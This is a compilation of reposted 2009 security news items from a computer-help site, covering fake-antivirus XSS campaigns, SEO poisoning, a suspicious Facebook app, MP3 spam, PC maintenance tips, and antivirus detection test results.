XSS Attacks Pushing Fake Antivirus - Friendly Computers

According to the security researchers at Zscaler (a cloud security company), malware distributors are exploiting security flaws in news.com.au, lawyer.com, appleinsider.com and many other legitimate websites to thrust fake antivirus software on unwitting computer users. - Friendly Computers

Read more below…

Zscaler states that the currently spreading attacks are worth noting, as they exploit cross-site scripting or XSS flaws to conceal malicious links inside the URLs of reputed websites. Consequently, people in the hope of viewing websites that they know as well as trust land on a page, which make them think that their PCs are infected by malware.

Mike Geide, Senior Security Researcher at Zscaler, said that the interesting fact about the attacks was that they had embedded iframes to divert people elsewhere, as reported by The Register on December 16, 2009.

It is still not known who the individual or group of individuals is responsible for the XSS attacks. However, it is not difficult to understand the motive behind these attacks, which is to exploit people's faith on a familiar website so that malware distributors can load fake anti-virus software on the maximum number of computers possible.

Moreover, these malware distributors also exploit the situation of a large time gap between the injection of malicious software into users' computers and the development of an antivirus product by AV firms to detect and block that software.

As earlier exploration of such AV software has indicated, cyber criminals, who thrust fake AV programs, make huge amounts of dollars every month.

Further, hijacking of legitimate websites for distributing fake antivirus is not anything new. Earlier this year (2009), criminals hijacked the website of NY Times for the same purpose and soon thereafter the Gizmodo site as well.

In fact, security companies describe FAKEAV as a rising hidden threat. Over the recent years, this threat has been escalating vastly. Computer security company 'PandaLabs' substantiated this with its detection of 374,000 FAKEAVs during Q2 2009. McAfee, another security company, too notified a similar trend.

Finally, it can be said that the threat of fake antivirus requires to be tackled urgently.

Source: http://www.spamfighter.com/News-13664-XSS-Attacks-Pushing-Fake-Antivirus.htm

You Don't Need to Regularly Reinstall Windows; Here's Why - Friendly Computers

One of the most persistent myths about Windows is that you need to reinstall the operating system regularly to keep it running at top performance. Let's take a look at the real problem and how to fix it. - Friendly Computers

Read more below…

Today we're talking about the myth that Windows slows down over time, and how to solve the problem. The reality is that Windows doesn't slow down if you just take care of your PC a little more. Follow these procedures, and you won't have to wonder if spending hours backing up data, installing from disc, and re-installing your essential applications is really necessary.

What Does Slow Windows Down Over Time?
I'm not going to sit here and tell you that your Windows PC will never slow down—because for many people, they almost always do. What actually slows your PC down are too many poorly written applications that stay resident in memory and waste CPU cycles, having too many badly written low-level applications that hook into Windows, or running more than one antivirus application at a time. And of course, if you've run your PC's hard drive out of space, you can hardly blame Windows for that.

If you aren't getting the picture, the problem is usually the person behind the keyboard that installed too many junk applications in the first place. More gently put, it's often that (very well-meaning) person's gradual easing of their safeguards and cleaning regimens as time goes by.

Stop Installing Junk Applications
Installing software should be thought of like feeding your PC. If you constantly feed your PC garbage apps, it's going to get sick and won't be able to run fast anymore. These poorly written applications clutter your drive with unnecessary DLL files, add always-resident Windows services when they don't need to, bloat up your registry, and add useless icons to your system tray that waste even more memory and CPU cycles. Usually you can get away with using a few terrible applications, but as you continue to install more and more of them, your PC will slow down to a crawl.

Be Smarter About What You Do Install
We feature and recommend a lot of software applications around here, but you should keep in mind that we aren't trying to tell you to install every single one of them at the same time-just install the applications that you actually need and you'll generally prevent the dreaded format and reinstall.

Here's a few tips to help you know what applications you should be careful with:

Apps that function as an Explorer plug-in, because they directly hook into the shell and any problem will make your entire PC slow or in the worst case, crash repeatedly.
Antivirus applications are notorious for slowing your PC down, and you should never, ever, ever use more than one real-time antivirus application at a time. We recommend Microsoft Security Essentials as a free, fast, and awesome antivirus tool.
Anything that says it will "Speed Up Your PC" or "Optimize Your RAM" will most likely slow it down, or best case, do nothing at all. Avoid these like the plague.
Make sure to install official system drivers from the manufacturer website. Drivers have a huge impact on performance, and you want to have stable, updated drivers.
Registry cleaners are a mixed bag, and really aren't going to speed up your PC in most cases. The biggest problem, however, is that too many of the commercial registry cleaners set themselves to run at startup in the system tray, wasting your memory and CPU cycles.
You should strongly consider the idea of using portable applications wherever possible, since their self-contained nature means they won't clutter up the rest of your PC with things you don't need.
Keep Your Computer Clean and Trim
Once you've rid yourself of your junk application habit and resolved to only use healthy, useful applications, you'll want to make sure to keep your PC clean of any remaining clutter that doesn't need to be there. You can set up a shortcut to manually run CCleaner silently with the push of a button, but your best bet is to set up CCleaner to run automatically on a schedule, so you don't have to remember to do it.

Since CCleaner is only going to clean up temporary files, you'll still need a good solution for keeping the rest of your PC clean-and Lifehacker's own Belvedere can help you automate your self-cleaning PC or automatically clean up your download folder.

With all of this automated file deletion going on, your hard drive is likely to get a bit fragmented. If you're already running Windows 7 or Vista, automatic defrag comes out of the box and probably shouldn't be messed with, but Windows XP users will need to use Windows Tasks to setup a schedule and automatically defrag their drives.

Use a Virtual Machine or Sandbox to Test Software
If you still want to test out all of the latest software, including apps that look a bit rough around the edges, your best bet is to use a virtual machine to test out anything before putting it onto your primary operating system. You can install all of your software in an XP or Windows 7 VM just like it was a real PC, and with the latest VMWare player releases, you can even enable Windows Aero in a guest VM. If you are new to the idea and need some more help, you should check out our beginner's guide to creating virtual machines in VirtualBox, or Windows 7 users can check out our guide to using XP Mode. If you don't want to go the virtual machine route, Windows XP and Vista users can alternatively use Windows SteadyState to protect their PC and roll back all of the changes on a reboot.

Source: http://lifehacker.com/5435523/you-dont-need-to-regularly-reinstall-windows-heres-why

The new look of Mobile security - Friendly Computers

BURLINGAME, USA: Our phones are becoming more like computers with every passing day. The good news is that we can take our data anywhere and work wherever we'd like. The bad news is that our phones are becoming more vulnerable to spyware, viruses and other attacks. - Friendly Computers
Read more below…

A start-up called Lookout is trying to make phones safer and views itself as the "Symantec or McAfee of the mobile space." In 2010, the company will offer software that can scan phones to determine which apps are safe and which are not. "Applying PC solutions to a mobile problem just won't work," says Lookout Chief Executive John Haring.

Yahoo! BuzzHere's how Lookout's technology works: You download the software, sign up for an account and configure the options you want to enable. The software offers anti-virus, data backup and device location. Then, when you download a new app from, say, the Android Marketplace, Lookout's software automatically scans the app and alerts you to take action if an app contains spyware or other malware.

"As marketplaces become more open, and a guy from Romania is next to Google, it becomes hard to tell what's good and what's not," says Lookout Chief Technologist Kevin Mahaffey. "We see a tremendous need for someone to pass an opinion."

Lookout's technology works on Microsoft's ( MSFT - news - people ) Windows Mobile, Google's Android, Apple's ( AAPL - news - people ) iPhone and Research In Motion's ( RIMM - news - people ) BlackBerry platforms.

Haring says Lookout will release all of the applications in 2010, and begin development for the Symbian platform, the world's most popular mobile operating system. For now the software is free to use, and Lookout plans to introduce premium features and subscription accounts later next year.

Source: http://www.ciol.com/Technology/Security/Feature/The-new-look-of-Mobile-security/231209129273/0/

Facebook Trojan: Brazen, but (Luckily) Benign - Friendly Computers

Third-party application called "Phutos" was able to mimic Facebook's native functionality. - Friendly Computers

Read more below…

This past weekend, a Trojan mimicked Facebook's native functionality and sent notifications on the user's behalf. While Facebook says that the application was harmless, its ability to break through a boundary of trust on the platform alarmed me.

The Trojan came to my attention on Saturday after I received several Facebook notifications (in the form of a red number in the bottom right of the page) telling me that friends had commented on my photos. It was the same notification that I receive on a day-to-day basis.

When I clicked on the notification, it attempted to load an application called "Phutos," which wanted access to my personal information and social network. I declined. A few minutes later, another notification appeared, but I was not taken to the application screen after I clicked on it. That seemed fishy, so I decided to review my applications.

"Phutos" was under my list of recently used applications-even though I never authorized its installation. At that point, I uninstalled the application and notified Facebook of my findings. Obviously, I also had some questions for it.

Facebook spokesperson Simon Axton stayed in steady contact with me over the weekend, and informed me on Monday that the company had disabled the application because it violated Facebook's Developer Principles and Policies. Facebook had determined that the application did not contain any malware, and has a dedicated enforcement team that investigates reports about suspicious applications, he told me.

When I asked what else Facebook does to protect its users, Axton said "We rely on reports from users for suspicious applications. Our team also conducts spot reviews of top applications and of many other applications, including looking at the data they need to run the application versus the data they gather. When we find a violation, we take action to enforce our policies."

It's great that Facebook says it's taking its users' safety seriously, but I am taken back by how easily a third-party application could mimic Facebook's default Web applications. Users can now specify what information applications may access, but everyone uses Facebook differently, so there is a bounty of information for malware to exploit.

There should be a wall between the Facebook development platform and the applications that make up the site itself.

Source: http://www.pcworld.com/article/185274/facebook_trojan_brazen_but_luckily_benign.html

Microsoft Virus Scanning Recommendations Bring Risks - Friendly Computers

We have recently received queries from customers about the official exclusion list recommendations from Microsoft. It seems that they have published a Knowledge Base entry that lists down recommendations to improve performance in Windows when running antivirus scanners. - Friendly Computers
Read more below…

This list recommends customers to exclude certain extensions and folders from antivirus scanning. Now, although it actually makes sense to stop checking Windows Update and some Group Policy-related files if you really want to speed up the system, we are concerned by the fact that this was released publicly.

This is an overview of these recommendations from Microsoft:

Certain files in the SoftwareDistribution folder.
Certain specific filename (for example: edb.chk)
A small extension list in certain specific folder (*.log)
Plus, some other similar lists for the Group Policy.

Following the recommendations does not pose a significant threat as of now, but it has a very big potential of being one. Cybercriminals may strategically drop or download a malicious file into one of the folders that are recommended to be excluded from scanning, or use a file extension that is also in the excluded list.

We find it sensible for users to aim for better system performance. However, we also think that excluding certain file types or folders from antivirus scanning is not something novice users should tinker with. Doing so may expose the system to risks that can lead to an inconvenience far more severe than a slightly slower system.

In line with this, we advise users to educate themselves fully about these recommendations before taking any actions. We recommend users not to exclude any file, unless there is a critical reason to do so, and be aware of the risks entailed by such an action.

Source: http://blog.trendmicro.com/microsoft-virus-scanning-recommendations-bring-risks/

MP3 Spam Is Back! - Friendly Computers

Old trends never die, it just resurface from time to time. - Friendly Computers
Read more below…

Case at point, spammed messages that have attached MP3 files, which was last seen two years ago, made its presence felt once again today.

Trend Micro researchers were alerted to the discovery of spammed messages that bore no subject and body content. The email message only contained a MP3 file that when executed, a voice advertising Viagra pills and other sexual enhancement pills is heard. The said “voice” also entices users to visit a certain URL, which points to the all-too familiar Canadian pharmacy sites.

In the past, Trend Micro has blogged about how cybercriminals utilized MP3 files or purport as such to proliferate their malicious activities in the following blog posts :

Storm Pump-and-Dump: The Musical
Music Unleashes the Malware Beast
Users are strongly advised not to open and execute attached files from unknowing users. Trend Micro secures users from this attack via its Smart Protection Network that blocks the said spammed messages.

Source: http://blog.trendmicro.com/mp3-spam-is-back/

AV-Test.Org Releases Real-World Malware Protection Report - Friendly Computers

Magdeburg-based research lab AV-Test.org today released the results of a lengthy real-world malware protection study. This test challenged a dozen major security suites to protect Internet-connected physical computers against up-to-the-minute threats. Each day for 60 days, researchers released 10 fresh threats on the test systems and analyzed each product's ability to detect the threat and to fully block its installation. They also checked for false alarms--valid programs reported as malware. All of the suites did a decent job, though some were significantly better than others. - Friendly Computers

Read more below…

The report notes that modern security suites include many layers of protection, including "URL filtering, web reputation services, exploit blocking, 'in-the-cloud' scanning as well as behavior-based protection mechanisms." A test that only challenges the product's on-demand scanner is not representative of real-world performance. The current test simply evaluated whether the product detected each malware sample, without regard for which security component handled the detection. Afterward, the team used in-house analysis software to determine whether the malware attack was successfully blocked.




This kind of dynamic testing is much more labor intensive than simply running a static collection of malware past an on-demand scanner. An automated static file test can process millions of samples without human intervention. By contrast, tracking the 600 malware samples and 400 clean files took all of AV-Test's resources. "Our entire lab with 14 full-time employees and up to 150 PCs and server systems were involved in this project."

Norton Internet Security 2010 scored highest at malware detection, at 98.0 percent. Even the least successful of the twelve, Trend Micro Internet Security 2010, detected 83.3 percent. Of course, detecting a threat doesn't always mean successfully preventing the attack. The top scorer for actual malware blocking was PC Tools Internet Security 2010, at 94.8 percent. CA Internet Security 2010 brought up the rear with 73.5 percent. Here are the full results:

MALWARE DETECTION RATES AND WARNING MESSAGES (FALSE ALARMS)



Tested Product Malware Detected False Alarms
Symantec Norton Internet Security 2010 98.0% almost none
Kaspersky Internet Security 2010 97.5% few
PC Tools Internet Security 2010 95.8% almost none
AVG Internet Security 9.0 92.2% few
G Data Internet Security 2010 90.0% many
Panda Internet Security 2010 90.0% almost none
Avira Premium Security Suite 9.0 87.7% many
McAfee Internet Security 2010 87.2% few
CA Internet Security 2010 86.7% few
F-Secure Internet Security 2010 85.8% almost none
BitDefender Internet Security 2010 84.3% few
Trend Micro Internet Security 2010 83.3% few




MALWARE BLOCKING RATES AND WARNING MESSAGES (FALSE ALARMS)



Tested Product Malware Blocked False Alarms
PC Tools Internet Security 2010 94.8% none
Symantec Norton Internet Security 2010 92.8% none
Kaspersky Internet Security 2010 89.8% few
Panda Internet Security 2010 88.7% none
Avira Premium Security Suite 9.0 87.2% none
McAfee Internet Security 2010 86.7% none
AVG Internet Security 9.0 84.2% few
G Data Internet Security 2010 83.0% few
Trend Micro Internet Security 2010 81.3% few
F-Secure Internet Security 2010 80.2% none
BitDefender Internet Security 2010 77.8% none
CA Internet Security 2010 73.5% none




This kind of dynamic testing is the wave of the future. It's hard to do, but it's the only way to really evaluate a product's ability to protect against malware.

Source: http://blogs.pcmag.com/securitywatch/2009/12/av-testorg_releases_real-world.php#more

Scammers exploit Google Doodle to spread malware - Friendly Computers

Online scammers are taking advantage of the public's interest in the Google Doodle to spread malware, a security firm warned on Tuesday - Friendly Computers
Read more below…

Online scammers are taking advantage of the public's interest in the Google Doodle to spread malware, a security firm warned on Tuesday.

In so-called "SEO poisoning," scammers use search engine optimization techniques to increase the distribution of malware. They create special malware-rigged Web sites or hide malware on legitimate Web sites they've compromised and then use tags associated with popular search terms to get them listed high up in search engine results.

Typically, scammers capitalize on public interest in news events or celebrities, targeting searches like "Swine Flu" or "Michael Jackson death." But in the latest twist on this technique, scammers are exploiting interest in the Google Doodle, the graphics that often take over the Google logo on holidays or to mark special events.

For instance, the doodle on Tuesday showed a flag for Esperanto, a universal language created by L.L. Zamenhof which is based on parts from a variety of languages. Clicking on the doodle, located near the search box, brings up a list of search terms for "L.L. Zamenhof."

Dave Michmerhuizen, a research scientist at Barracuda Networks, found 31 poisoned sites among the first 100 results, 27 of them in the first 50 sites alone.

On the first results page was a link leading to a compromised Web site that redirects visitors to a fake antivirus site, according to Michmerhuizen. That site displays a fake alert saying the computer might be infected and does a fake scan before prompting the user to pay for antivirus software, he said.

A Google spokesperson said the company had already removed many of the allegedly malicious sites from the index using manual and automated processes to enforce the policies.

"As you probably know, the use of popular search terms to target malware is neither a new vector nor unique to any particular search engine. We work hard to protect our users from malware, and using any Google product to serve malware is a violation of our product policies," the spokesperson said in an e-mail.

"Our Safe Browsing technology is capable of detecting malware being served from sites that have been compromised," the Google e-mail said. "In fact, as we've explained publicly, we have been seeing more infections coming from compromised sites" across the entire Web.

Source: http://news.cnet.com/8301-27080_3-10416246-245.html?tag=mncol

Rating the best anti-malware solutions - Friendly Computers

AV-Comparatives' December 2009 report has been released and there are eight winners. The other eight products didn't do so well.
Friendly Computers
Read more below…

Following its November 2009 retrospective/proactive report, AV-Comparatives has released its December 2009 Potentially Unwanted Applications (PUA) comparative. PUA refers to adware, spyware, rogue, and other fraudulent software circulating on the Internet that are not typical malware (classification in the last category is sometimes not an easy task; under some circumstances, PUAs are accepted in some countries, depending on the cultural background or the legal system, and hence the term "potentially unwanted"). AV-Comparatives typically do not include PUAs in their malware test sets, but since users may want to know how well their antivirus program detects potentially unwanted software, a separate test was created.

The first PUA test contained 750,297 individual samples (only program executables) that cover mainly adware, spyware, and rogue software gathered between January 2009 and October 2009 (sets were frozen on the October 29, 2009). Dialers, potentially dangerous tools, and other greyware were not included, as their classification is debatable. Not all security products include detection for them as this sometimes breaks company policy. Sixteen products were updated on November 6, 2009, set on the highest detection settings (except for Sophos and F-Secure, per their own request), and put to the test.

Here are the results of this particular test:

1.G DATA Antivirus 2010: 99.8 percent
2.Trustport Antivirus 2010: 99.8 percent
3.AVIRA AntiVir Premium 9.0: 98.9 percent
4.McAfee VirusScan Plus 2010: 98.9 percent
5.BitDefender Antivirus 2010: 98.6 percent
6.eScan AntiVirus 10.0: 98.6 percent
7.F-Secure Anti-Virus 2010: 98.6 percent
8.Symantec Norton Antivirus 2010: 98.6 percent
9.Kaspersky Anti-Virus 2010: 96.7 percent
10.ESET NOD32 Antivirus 4.0: 96.5 percent
11.avast! Free 5.0: 96.3 percent
12.Sophos Antivirus 9.0.1: 95.4 percent
13.Microsoft Security Essentials 1.0: 94.6 percent
14.AVG Anti-Virus 9.0: 93.9 percent
15.Norman Antivirus & Anti-Spyware 7.30: 88.5 percent
16.Kingsoft AntiVirus 9 Plus: 87.1 percent

Missed Samples in Percentage Points
AV-Comparatives The bulleted list represents the detection rates in percentage points for adware, spyware, and rogues, while the chart shows the number of missed samples in percentage points. After taking these results into consideration, AV-Comparatives rated the security companies from best to worst in three categories:

•Advanced+: TrustPort, G DATA, McAfee, AVIRA, Symantec, F-Secure, BitDefender, eScan
•Advanced: Kaspersky, ESET, Avast, Sophos, Microsoft, AVG
•Standard: Norman, Kingsoft
The results seem to suggest that the best antivirus applications that regularly rank highly in general malware tests are not necessarily as good at anti-adware, antispyware, and antirogue detection. That said, all 16 products detected at least 85 percent of the threats, which is respectable. Overall, we can say that the detection rate of PUAs is similar to the detection rate of general malware.

It's worth noting that this is the first AV-Comparatives test in which Microsoft Security Essentials (MSE), Redmond's free antimalware solution, was tested in its final 1.0 form. MSE was released in September 2009 and these tests were performed last month. Clearly Microsoft has work to do, at least in the PUA department (the beta version did quite well in older antimalware tests).